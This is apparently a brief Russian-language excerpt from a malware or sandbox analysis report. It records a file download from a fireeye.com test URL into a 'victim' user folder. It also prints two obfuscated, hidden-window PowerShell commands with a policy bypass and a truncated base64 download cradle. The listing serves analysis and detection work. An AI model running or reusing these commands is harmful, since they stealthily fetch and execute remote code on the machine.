Техническая информация
- https://fedeploycheck.fireeye.com/test-infection.exe как c:\users\victim\appdata\roaming\1.exe
- '<SYSTEM32>\cmd.exe' /c pOwerSHell.exe -eXecuTIonPoLIcy byPAss -nOproFIlE -WiNDOwstYlE HIddEN -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgB...
- '<SYSTEM32>\cmd.exe' /c pOwerSHell.exe -eXecuTIonPoLIcy byPAss -nOproFIlE -WiNDOwstYlE HIddEN -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgB...' (со скрытым окном)